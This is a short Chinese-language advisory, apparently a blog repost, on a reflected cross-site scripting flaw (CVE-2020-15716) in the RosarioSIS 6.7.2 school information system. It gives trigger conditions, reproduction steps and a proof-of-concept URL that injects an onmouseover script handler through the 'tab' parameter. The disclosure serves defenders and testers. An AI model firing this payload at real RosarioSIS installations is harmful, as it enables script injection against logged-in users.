RosarioSIS 6.7.2 跨站脚本(XSS)漏洞技术分析

本文详细分析了RosarioSIS学生信息系统6.7.2版本中存在的跨站脚本(XSS)漏洞(CVE-2020-15716),包含漏洞原理、利用条件、复现步骤及具体的POC攻击向量。

漏洞标题:RosarioSIS 6.7.2 - 跨站脚本 (XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://gitlab.com/francoisjacquet/rosariosis

软件链接:https://gitlab.com/francoisjacquet/rosariosis

版本:6.7.2

测试环境:Windows

CVE:CVE-2020-15716

概念验证(POC)

1

http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

触发条件

  1. 用户必须已通过身份验证(如 Warehous.php 中的会话检查所示)
  2. 请求中不能存在 modfunc 参数

复现步骤

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次